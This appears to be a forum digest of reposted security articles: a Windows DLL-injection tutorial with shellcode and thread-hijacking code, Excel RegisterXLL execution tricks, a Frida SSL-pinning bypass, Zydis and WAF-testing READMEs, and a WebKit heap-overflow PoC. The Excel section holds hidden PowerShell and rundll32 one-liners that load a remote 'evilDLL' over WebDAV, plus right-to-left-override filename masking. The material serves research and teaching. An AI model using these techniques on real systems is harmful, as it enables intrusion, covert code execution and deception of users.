    0x68, 0xef, 0xbe, 0xad, 0xde,                               // push 0xdeadbeef (dummy value, popped below; fastcall convention)
    0x48, 0xB9, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rcx, 0CCCCCCCCCCCCCCCCh (placeholder for DLL path name)
    0x48, 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, 0CCCCCCCCCCCCCCCCh (placeholder for LoadLibrary)
    0xFF, 0xD0,                                                 // call rax (call LoadLibrary)
    0x58,                                                       // pop dummy
    0x41, 0x5F,                                                 // pop r15
    0x41, 0x5E,                                                 // pop r14
    0x41, 0x5D,                                                 // pop r13
    0x41, 0x5C,                                                 // pop r12
    0x41, 0x5B,                                                 // pop r11
    0x41, 0x5A,                                                 // pop r10
    0x41, 0x59,                                                 // pop r9
    0x41, 0x58,                                                 // pop r8
    0x5F,                                                       // pop rdi
    0x5E,                                                       // pop rsi
    0x5D,                                                       // pop rbp
    0x5B,                                                       // pop rbx
    0x5A,                                                       // pop rdx
    0x59,                                                       // pop rcx
    0x9D,                                                       // popfq
    0x58,                                                       // pop rax
    0xC3                                                        // ret

Before we inject this code into the target process, some placeholders need to be filled/patched with:

- The return address (the address where the thread should resume once the code stub has finished execution)
- The DLL path name
- The address of LoadLibrary()

And that's when the game of hijacking, suspending, injecting, and resuming a thread comes into play. We first need to attach to the target/remote process, of course, and allocate memory in it. Note that we need to allocate memory with read and write privileges to hold the DLL path name and to hold our assembly code that will load the DLL.

    LPVOID lpDllAddr = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    stub = VirtualAllocEx(hProcess, NULL, stubLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

Next, we need to get the context of one of the threads running in the target/remote process (the one that is going to be injected with our assembly code). To find the thread, we use the function 'getThreadID()'; you can find it in the file 'auxiliary.cpp'. Once we have our thread id, we open the thread.

    hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, threadID);

Next, we need to suspend the thread to capture its context. The context of a thread is the state of its registers. We are particularly interested in EIP/RIP (call it IP, the instruction pointer, if you want). Since the thread is suspended, we can change the EIP/RIP value and force it to continue its execution in a different path (our code cave).

    ctx.ContextFlags = CONTEXT_CONTROL;
    GetThreadContext(hThread, &ctx);
    DWORD64 oldIP = ctx.Rip;
    ctx.Rip = (DWORD64)stub;
    ctx.ContextFlags = CONTEXT_CONTROL;

    WriteProcessMemory(hProcess, (void *)stub, &sc, stubLen, NULL); // write code cave
    SetThreadContext(hThread, &ctx);
    ResumeThread(hThread);

So, we suspend the thread, we capture the context, and from there we extract the EIP/RIP. This is saved so execution can resume when our injected code finishes. The new EIP/RIP is set to our injected code location.
We then patch all the placeholders with the return address, the DLL path name address, and the 'LoadLibrary()' address. Once the thread starts executing, our DLL will be loaded, and once it finishes it will return back to the point where it was suspended and resume its execution there.

If you feel like debugging this technique as a learning exercise, here's how to do it. Launch the application you want to inject into, let's say 'notepad.exe'. Run 'injectAllTheThings_64.exe' under 'x64dbg', using the following command line (adapt it to your environment):

    "C:\Users\rui\Documents\Visual Studio 2013\Projects\injectAllTheThings\bin\injectAllTheThings_64.exe" -t 6 notepad.exe "c:\Users\rui\Documents\Visual Studio 2013\Projects\injectAllTheThings\bin\dllmain_64.dll"

Set a breakpoint on the call to 'WriteProcessMemory()'. Let it run, and when the breakpoint is hit take note of the memory address in the RDX register. If you are asking yourself why RDX, it is time to read about the calling convention used on x64. Have fun and come back once you finish.

Step over (F8) the call to 'WriteProcessMemory()', launch another instance of x64dbg and attach it to 'notepad.exe'. Go to the address copied before (the one in RDX) by pressing 'Ctrl + g' and you will see our code cave assembly. Cool, huh!? Now set a breakpoint at the beginning of this shellcode. Go back to the debugged 'injectAllTheThings' process and let it run. Our breakpoint is hit and we can now step over the code and enjoy this piece of code working. Once we call the 'LoadLibrary()' function, we get our DLL loaded. This is so beautiful... Our shellcode will return to the previously saved RIP and 'notepad.exe' will resume execution.

For the complete source code see 't_suspendInjectResume.cpp'.
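To see what that patching step looks like in isolation, here is a minimal, portable C sketch of mine (an illustration, not code from the 'injectAllTheThings' project): it finds the next run of 0xCC placeholder bytes in the stub and overwrites it with a real value. The actual injector does this three times, in order: return address, DLL path address, 'LoadLibrary()' address.

```c
#include <stdint.h>
#include <string.h>

/* Replace the first run of `width` 0xCC placeholder bytes in `stub`
 * with `value` (stored little-endian, as x86/x64 immediates are on a
 * little-endian host). Returns the offset that was patched, or -1 if
 * no placeholder is left. */
static int patch_placeholder(uint8_t *stub, size_t len, size_t width, uint64_t value)
{
    for (size_t i = 0; i + width <= len; i++) {
        size_t j = 0;
        while (j < width && stub[i + j] == 0xCC)
            j++;
        if (j == width) {
            memcpy(&stub[i], &value, width);
            return (int)i;
        }
    }
    return -1;
}
```

Because all placeholders look identical, the order of the calls matters: each call consumes the next unpatched 0xCC run, mirroring the layout of the stub above.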
Reflective DLL injection

I also incorporated Stephen Fewer's (the pioneer of this technique) code into the 'injectAllTheThings' project, and I also built a reflective DLL to be used with this technique. Note that the DLL we're injecting must be compiled with the appropriate includes and options, so it aligns itself with the Reflective DLL injection method.

Reflective DLL injection works by copying the entire DLL into memory, so it avoids registering the DLL with the process. All the heavy lifting is already done for us. To obtain the entry point of our DLL when it's loaded in memory we only have to use Stephen Fewer's code. The 'LoadRemoteLibraryR()' function included in his project does it for us. We use 'GetReflectiveLoaderOffset()' to determine the offset in our process's memory, then we use that offset plus the base address of the memory in the target/remote process (where we wrote the DLL) as the execution starting point.

Too complex? Yes, it might be. Here are the four main steps to achieve this:

1. Write the DLL headers into memory
2. Write each section into memory (by parsing the section table)
3. Check imports and load any other imported DLLs
4. Call the DllMain entry-point

This technique offers a great level of stealth in comparison to the other methods, and is massively used in Metasploit. If you want to know more just go to the official GitHub repository. Also, make sure to read Stephen Fewer's paper about it here. In addition, have a look at Loading a DLL from memory by Joachim Bauch, author of MemoryModule, and this nice post about Loading Win32/64 DLLs "manually" without LoadLibrary().

Code

There are some more obscure and complex injection methods around, so I'll eventually update the 'injectAllTheThings' project in the future. Some of the most interesting ones I've seen lately are:

- The one used by DOUBLEPULSAR
- The one written by @zerosum0x0, Reflective DLL injection using SetThreadContext() and NtContinue(), described here and with code available here.
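Step 2 of the reflective loading process described above (mapping sections from file layout to virtual layout) is conceptually simple. Here is a stripped-down, portable illustration of mine using a synthetic section table instead of a real PE section header, so it compiles anywhere; a real loader reads these three fields from each IMAGE_SECTION_HEADER:

```c
#include <stdint.h>
#include <string.h>

/* A synthetic stand-in for the three IMAGE_SECTION_HEADER fields a
 * reflective loader actually needs. */
typedef struct {
    uint32_t virtual_address; /* where the section lives in the mapped image */
    uint32_t raw_offset;      /* where its bytes start in the file on disk   */
    uint32_t raw_size;        /* how many bytes to copy                      */
} section_t;

/* Copy every section from the raw file image into its place in the
 * freshly allocated in-memory image. */
static void map_sections(uint8_t *image, const uint8_t *file,
                         const section_t *sections, size_t count)
{
    for (size_t i = 0; i < count; i++)
        memcpy(image + sections[i].virtual_address,
               file  + sections[i].raw_offset,
               sections[i].raw_size);
}
```

The gap this leaves between sections (raw offsets are packed on disk, virtual addresses are page-aligned in memory) is exactly why the DLL cannot simply be copied byte-for-byte.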
All of the techniques I described above are implemented in one single project I made available on GitHub. It also includes the required DLLs for each of the techniques. The table below makes it easy to understand what's actually implemented and how to use it.

    Method                  32 bits   64 bits   DLL to use
    CreateRemoteThread()    +         +         dllmain_32.dll / dllmain_64.dll
    NtCreateThreadEx()      +         +         dllmain_32.dll / dllmain_64.dll
    QueueUserAPC()          +         +         dllmain_32.dll / dllmain_64.dll
    SetWindowsHookEx()      +         +         dllpoc_32.dll / dllpoc_64.dll
    RtlCreateUserThread()   +         +         dllmain_32.dll / dllmain_64.dll
    SetThreadContext()      +         +         dllmain_32.dll / dllmain_64.dll
    Reflective DLL          +         +         rdll_32.dll / rdll_64.dll

Needless to say, to be on the safe side, always use injectAllTheThings_32.exe to inject into 32-bit processes and injectAllTheThings_64.exe to inject into 64-bit processes. That said, you can also use injectAllTheThings_64.exe to inject into 32-bit processes. And, actually, you can go from WoW64 to 64 bits (I didn't implement it, but I might give it a try later), which is basically what Metasploit's 'smart_migrate' does. Have a look here.

The code for the whole project, including the DLLs, is available on GitHub. Compile it for 32 and 64 bits, with or without debugging, and have fun.
References

- http://www.nologin.org/Downloads/Papers/remote-library-injection.pdf
- https://warroom.securestate.com/dll-injection-part-1-setwindowshookex/
- https://warroom.securestate.com/dll-injection-part-2-createremotethread-and-more/
- http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
- http://resources.infosecinstitute.com/using-createremotethread-for-dll-injection-on-windows/
- http://securityxploded.com/ntcreatethreadex.php
- https://www.codeproject.com/Tips/211962/Bit-Injection-Cave
- http://www.blizzhackers.cc/viewtopic.php?p=2483118
- http://resources.infosecinstitute.com/code-injection-techniques/
- Windows via C/C++, 5th Edition

Authored by rui Jul 16th, 2017 7:49 pm

Sursa: http://blog.deniable.org/blog/2017/07/16/inject-all-the-things/
-
DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV; they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here, including his simple example of an XLL.

An interesting thing about Office is that it will perform file format sniffing for certain extensions, such as .xls, .xlk, and .doc (and probably more). This means that you can rename the .xll to a .xls or .xlk and it will still open. However, the initial add-in warning is still triggered, along with another warning that mentions that the file format and extension don't match.

Since the add-in warning shows the full path to the filename, certain Unicode characters can be used to mask the .xll extension. One of my favorites is the Right-to-Left Override character (http://www.fileformat.info/info/unicode/char/202e/index.htm). By using this character, you can make the Excel file appear as if it has any extension. For example, the filename Footbaslx.xll (with the override character embedded after "Footba") would display as Footballx.xls, since everything after the character is reversed.

Here is a basic example of a DLL with the required xlAutoOpen export to make it an XLL that executes on open. As with any DLL, execution can also be triggered in the DLL_PROCESS_ATTACH case.
    // Compile with: cl.exe notepadXLL.c /LD /o notepad.xll
    #include <Windows.h>

    __declspec(dllexport) void __cdecl xlAutoOpen(void);

    void __cdecl xlAutoOpen()
    {
        // Triggers when Excel opens
        WinExec("cmd.exe /c notepad.exe", 1);
    }

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }

Below are samples of various ways this can be executed.

Javascript:

    // Create instance of Excel.Application COM object
    var excel = new ActiveXObject("Excel.Application");
    // Pass in path to the DLL (can use any extension)
    excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz");
    // Delivered via WebDAV
    excel.RegisterXLL("\\\\webdavserver\\files\\evilDLL.jpg");

Rundll32.exe mshtml.dll one-liner:

    rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('\\\\webdavserver\\files\\evilDLL.jpg');this.close();

Powershell:

    # Create instance of Excel.Application COM object
    $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
    # Pass in path to the DLL (can use any extension)
    $excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt")
    # Delivered via WebDAV
    $excel.RegisterXLL("\\webdavserver\files\evilDLL.jpg");
    # One liner with WebDAV:
    powershell -w hidden -c "IEX ((New-Object -ComObject Excel.Application).RegisterXLL('\\webdavserver\files\evilDLL.jpg'))"

@rxwx discovered that this can also be used for lateral movement in environments that support DCOM (source); here is an example:

    $Com = [Type]::GetTypeFromProgID("Excel.Application","192.168.1.111")
    $Obj = [System.Activator]::CreateInstance($Com)
    # Detect Office bitness so proper DLL can be used
    $isx64 = [boolean]$obj.Application.ProductCode[21]
    # Load DLL from WebDAV
    $obj.Application.RegisterXLL("\\webdavserver\addins\calcx64.dll")

The DCOM pivoting technique has been added to Invoke-DCOM.ps1 by @rvrsh3ll, thanks to @rxwx. Here is another XLL PoC by @MooKitty.

Sursa: https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
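The right-to-left override trick mentioned above is easy to demonstrate. This small C sketch of mine (an illustration, not part of the gist) builds the masked filename with U+202E embedded as UTF-8; text renderers display it as Footballx.xls, but the actual extension, the one Windows and Excel act on, is still .xll:

```c
#include <stdio.h>
#include <string.h>

/* Build a filename containing U+202E (RIGHT-TO-LEFT OVERRIDE, UTF-8
 * "\xE2\x80\xAE"). Everything after the override renders reversed, so
 * "Footba" + RLO + "slx.xll" is displayed as "Footballx.xls". */
static void make_masked_name(char *out, size_t cap)
{
    snprintf(out, cap, "Footba\xE2\x80\xAEslx.xll");
}
```

The override character is invisible in most file dialogs, which is what makes the full path shown in the add-in warning misleading.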
-
Universal Android SSL Pinning bypass with Frida

On 25 Jul, 2017 By Piergiovanni Cipolloni

Android SSL Re-Pinning

Two kinds of SSL Pinning implementations can be found in Android apps: the home-made and the proper one. The former is usually a single method, performing all the certificate checks (possibly using custom libraries), that returns a Boolean value. This means that this approach can be easily bypassed by identifying the interesting method and flipping the return value. The following example is a simplified version of a Frida JavaScript script: after we identify the offending method (hint: logcat), we basically hijack it and let it always return true.

When SSL Pinning is instead performed according to the official Android documentation, well... things get tougher. There are many excellent solutions out there: custom Android images, underlying frameworks, socket.relaxsslcheck=yes, etc. Almost every attempt at bypassing SSL Pinning is based on manipulating the SSLContext. Can we manipulate the SSLContext with Frida? We wanted a generic/universal approach, and we wanted to do it with a Frida JavaScript script. The idea here is to do exactly what the official documentation suggests doing, so we've ported the SSL Pinning Java code to Frida JavaScript.

How it works:

1. Load our rogue CA's cert from the device
2. Create our own KeyStore containing our trusted CAs
3. Create a TrustManager that trusts the CAs in our KeyStore
4. When the application initializes its SSLContext, we hijack the SSLContext.init() method and, when it gets called, we swap the 2nd parameter, which is the application's TrustManager, with our own TrustManager we previously prepared (SSLContext.init(KeyManager, TrustManager, SecureRandom))

This way we basically re-pin the application to our own CA!
Example

    $ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt
    $ adb shell "/data/local/tmp/frida-server &"
    $ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause
    […]
    [USB::Samsung GT-31337::['it.app.mobile']]->
    [.] Cert Pinning Bypass/Re-Pinning
    [+] Loading our CA...
    [o] Our CA Info: CN=PortSwigger CA, OU=PortSwigger CA, O=PortSwigger, L=PortSwigger, ST=PortSwigger, C=PortSwigger
    [+] Creating a KeyStore for our CA...
    [+] Creating a TrustManager that trusts the CA in our KeyStore...
    [+] Our TrustManager is ready...
    [+] Hijacking SSLContext methods now...
    [-] Waiting for the app to invoke SSLContext.init()...
    [o] App invoked javax.net.ssl.SSLContext.init...
    [+] SSLContext initialized with our custom TrustManager!
    [o] App invoked javax.net.ssl.SSLContext.init...
    [+] SSLContext initialized with our custom TrustManager!
    [o] App invoked javax.net.ssl.SSLContext.init...
    [+] SSLContext initialized with our custom TrustManager!
    [o] App invoked javax.net.ssl.SSLContext.init...
    [+] SSLContext initialized with our custom TrustManager!

In this case the application invoked SSLContext.init four times, which means it verified four different certs (two of which were used by 3rd party tracking libs).

Download here: frida-android-repinning_sa.js, or from Frida Codeshare here: https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/

Frida & Android: https://www.frida.re/docs/android/

Sursa: https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
-
Zyan Disassembler Engine (Zydis)

Fast and lightweight x86/x86-64 disassembler library.

Features

- Supports all x86 and x86-64 (AMD64) general-purpose and system instructions.
- Supports pretty much all ISA extensions:
  - FPU (x87), MMX
  - SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2, SSE4A, AESNI
  - AVX, AVX2, AVX512BW, AVX512CD, AVX512DQ, AVX512ER, AVX512F, AVX512PF, AVX512VL
  - ADX, BMI1, BMI2, FMA, FMA4
  - ...
- Optimized for high performance
- No dynamic memory allocation
- Perfect for kernel-mode drivers and embedded devices
- Very small file-size overhead compared to other common disassembler libraries
- Complete doxygen documentation

Roadmap

- Language bindings [v2.0 final]
- Tests [v2.0 final]
- Graphical editor for the instruction-database [v2.0 final]
- Implement CMake feature gates. Currently, everything is always included. [v2.0 final]
- Encoding support [v2.1]

Quick Example

The following example program uses Zydis to disassemble a given memory buffer and prints the output to the console.

    #include <inttypes.h>
    #include <stdio.h>
    #include <Zydis/Zydis.h>

    int main()
    {
        uint8_t data[] =
        {
            0x51, 0x8D, 0x45, 0xFF, 0x50, 0xFF, 0x75, 0x0C, 0xFF, 0x75, 0x08,
            0xFF, 0x15, 0xA0, 0xA5, 0x48, 0x76, 0x85, 0xC0, 0x0F, 0x88, 0xFC,
            0xDA, 0x02, 0x00
        };

        ZydisDecoder decoder;
        ZydisDecoderInit(&decoder, ZYDIS_MACHINE_MODE_LONG_64, ZYDIS_ADDRESS_WIDTH_64);

        ZydisFormatter formatter;
        ZydisFormatterInitEx(&formatter, ZYDIS_FORMATTER_STYLE_INTEL,
            ZYDIS_FMTFLAG_FORCE_SEGMENTS | ZYDIS_FMTFLAG_FORCE_OPERANDSIZE,
            ZYDIS_FORMATTER_ADDR_ABSOLUTE, ZYDIS_FORMATTER_DISP_DEFAULT,
            ZYDIS_FORMATTER_IMM_DEFAULT);

        uint64_t instructionPointer = 0x007FFFFFFF400000;
        uint8_t* readPointer = data;
        size_t length = sizeof(data);

        ZydisDecodedInstruction instruction;
        char buffer[256];
        while (ZYDIS_SUCCESS(ZydisDecoderDecodeBuffer(&decoder, readPointer, length,
            instructionPointer, &instruction)))
        {
            readPointer += instruction.length;
            length -= instruction.length;
            instructionPointer += instruction.length;

            printf("%016" PRIX64 "  ", instruction.instrAddress);
            ZydisFormatterFormatInstruction(&formatter, &instruction, &buffer[0], sizeof(buffer));
            printf(" %s\n", &buffer[0]);
        }
    }

Sample Output

The above example program generates the following output:

    007FFFFFFF400000   push rcx
    007FFFFFFF400001   lea eax, dword ptr ss:[rbp-0x01]
    007FFFFFFF400004   push rax
    007FFFFFFF400005   push qword ptr ss:[rbp+0x0C]
    007FFFFFFF400008   push qword ptr ss:[rbp+0x08]
    007FFFFFFF40000B   call qword ptr ds:[0x008000007588A5B1]
    007FFFFFFF400011   test eax, eax
    007FFFFFFF400013   js 0x007FFFFFFF42DB15

Compilation

Zydis builds cleanly on most platforms without any external dependencies. You can use CMake to generate project files for your favorite C99 compiler.

    # Linux and OS X
    git clone 'https://github.com/zyantific/zydis.git'
    cd zydis
    mkdir build && cd build
    cmake ..
    make

ZydisInfo tool

License

Zydis is licensed under the MIT license.

Sursa: https://github.com/zyantific/zydis
-
Framework for Testing WAFs (FTW)

Purpose

This project was created by researchers from ModSecurity and Fastly to help provide rigorous tests for WAF rules. It uses the OWASP Core Ruleset v3 as a baseline to test rules on a WAF. Each rule from the ruleset is loaded into a YAML file that issues HTTP requests that will trigger these rules. Goals / use cases include:

- Find regressions in WAF deployments by using continuous integration and issuing repeatable attacks against a WAF
- Provide a testing framework for new rules in ModSecurity: if a rule is submitted it MUST have corresponding positive & negative tests
- Evaluate WAFs against a common, agreeable baseline ruleset (OWASP)
- Test and verify custom rules for WAFs that are not part of the core rule set

Installation

    git clone git@github.com:fastly/ftw.git
    cd ftw

Make sure that pip is installed:

    apt-get install python-pip
    pip install -r requirements.txt

Running tests with HTML-contains and status-code checks only

Create YAML files that point to your web server with a WAF in front of it:

    py.test test/test_default.py --ruledir test/yaml

Provisioning Apache + ModSecurity + OWASP CRS

If you require an environment for testing WAF rules, one has been created with Apache, ModSecurity and version 3.0.0 of the OWASP core ruleset.
This can be deployed by:

1. Checking out the repository: git clone https://github.com/fastly/waf_testbed.git
2. Typing vagrant up

Running tests while overriding the destination address in the YAML files with a custom domain

Start your test web server, then:

py.test test/test_default.py --ruledir=test/yaml --destaddr=domain.com --port 443 --protocol https

Run the integration test against a local web server (you may have to use sudo):

py.test test/integration/test_logcontains.py -s --ruledir=test/integration/

HOW TO INTEGRATE LOGS

1. Create a *.py file with the necessary imports; an example is shown in test/integration/test_logcontains.py.
2. All functions whose names begin with test will be run by py.test, so define a function such as def test_somewaf.
3. Implement a class that inherits LogChecker.
4. Implement the get_logs() function. FTW will call this function after it runs the test, and it will set the datetimes self.start and self.end.
5. Use the information from the datetime variables to retrieve the log entries from your WAF, whether from a file or an API call.
6. Get the logs, store them in an array of strings, and return it from get_logs().
7. Make use of py.test fixtures: decorate a function with @pytest.fixture and return your new LogChecker object. Whenever a test function takes an argument matching the name of that fixture, py.test will instantiate your object, which makes it easier to run tests. An example of this is in the Python file from step 1.
8. Write a testing configuration in the *.yaml format as seen in test/integration/LOGCONTAINSFIXTURE.yaml. The log_contains line requires a string that is a regex. FTW will compile the log_contains string from each stage in the YAML file into a regex. This regex will then be used alongside the lines of logs passed in from get_logs() to look for a match. The log_contains string, then, should be a unique rule ID, as FTW is greedy and will pass on the first match.
False positives are mitigated by the start/end times passed to the LogChecker object, but it is best to stay safe and use unique regexes. For each stage, the get_logs() function is called, so be sure to account for API calls if that's how you retrieve your logs.

Making HTTP requests programmatically

Although it is preferred to make requests using the YAML format, automated tests often require making many dynamic requests. In such a case it is recommended to use the py.test framework in order to produce test cases that can be run as part of the whole. Generally, making an HTTP request is simple:

1. Create an instance of the HttpUA() class
2. Create an instance of the Input() class, providing whatever parameters you don't want to be defaulted
3. Provide the instance of the Input class to HttpUA.send_request()

For some examples see the http integration tests.

Sursa: https://github.com/fastly/ftw
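The first-match semantics of log_contains described above can be sketched in plain Python. This is an illustrative sketch, not FTW's actual implementation; the log lines and rule IDs below are hypothetical:

```python
import re

def log_contains(pattern, log_lines):
    """Return True as soon as any log line matches the compiled regex
    (greedy, first-match semantics, as described above)."""
    compiled = re.compile(pattern)
    return any(compiled.search(line) for line in log_lines)

# Hypothetical WAF log lines retrieved between self.start and self.end
logs = [
    'ModSecurity: Warning. Pattern match "union.*select" [id "942100"]',
    'ModSecurity: Access denied with code 403 [id "949110"]',
]

# Using a unique rule ID as the pattern helps avoid false positives
print(log_contains(r'id "942100"', logs))  # True
print(log_contains(r'id "999999"', logs))  # False
```

Because the match is greedy, a pattern shared by several rules would pass on whichever log line happens to appear first, which is why the text above recommends unique rule IDs.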
Published on Jul 19, 2017

Escaping the (sand)box: the promises and pitfalls of modern computational load isolation techniques for Linux OS

Users of modern Linux containerization technologies are frequently at a loss as to what kind of security guarantees are delivered by the tools they use. Typical questions range from "Can these be used to isolate software with known security shortcomings and a rich history of security vulnerabilities?" to "Can I use such a technique to isolate user-generated and potentially hostile assembler payloads?" The modern Linux OS code base, as well as independent authors, provides a plethora of options for those who want to make sure that their computational loads are solidly confined. Potential users can choose from solutions ranging from Docker-like confinement projects, through Xen hypervisors, seccomp-bpf and ptrace-based sandboxes, to isolation frameworks based on hardware virtualization (e.g. KVM). The talk discusses the techniques available today, with a focus on their (frequently overstated) promises regarding strength. In the end, as they say: "Many speed bumps don't make a wall."

CONFidence: http://confidence.org.pl/
Facebook: https://www.facebook.com/confidence.c...
Twitter: https://twitter.com/CONFidence_news
There is a heap buffer overflow in WebKit. The vulnerability was confirmed on an ASan build of WebKit nightly.

PoC:

=================================================================
<script>
function go() {
    i.value = "1";
    i.type = "search";
    f.submit();
}
</script>
<body onload=go()>
<form id="f">
<input id="i" results="1">
=================================================================

ASan log:

=================================================================
==805==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200006a660 at pc 0x000116496d47 bp 0x7fff5597b2a0 sp 0x7fff5597b298
READ of size 8 at 0x61200006a660 thread T0
==805==WARNING: invalid path to external symbolizer!
==805==WARNING: Failed to use and restart external symbolizer!
    #0 0x116496d46 in WTF::VectorBufferBase<WebCore::RecentSearch>::buffer() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694d46)
    #1 0x116496bed in WTF::Vector<WebCore::RecentSearch, 0ul, WTF::CrashOnOverflow, 16ul>::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694bed)
    #2 0x116493b4b in unsigned int WTF::Vector<WebCore::RecentSearch, 0ul, WTF::CrashOnOverflow, 16ul>::removeAllMatching<WebCore::RenderSearchField::addSearchResult()::$_0>(WebCore::RenderSearchField::addSearchResult()::$_0 const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2691b4b)
    #3 0x116493860 in WebCore::RenderSearchField::addSearchResult() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2691860)
    #4 0x114905297 in WebCore::FormSubmission::create(WebCore::HTMLFormElement&, WebCore::FormSubmission::Attributes const&, WebCore::Event*, WebCore::LockHistory, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb03297)
    #5 0x114b3aaab in
WebCore::HTMLFormElement::submit(WebCore::Event*, bool, bool, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd38aab) #6 0x1154cd5a0 in WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16cb5a0) #7 0x1154c99a8 in long long WebCore::BindingCaller<WebCore::JSHTMLFormElement>::callOperation<&(WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16c79a8) #8 0x58d153801027 (<unknown module>) #9 0x11fd2434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a) #10 0x11fd2434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a) #11 0x11fd1d91a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a) #12 0x11f982757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757) #13 0x11f9043da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da) #14 0x11ef3c0f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1) #15 0x11ef3c362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362) #16 0x11ef3c6d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3) #17 0x114ff5a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15) #18 0x115389510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510) #19 0x11478a68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e) #20 0x11478a170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) 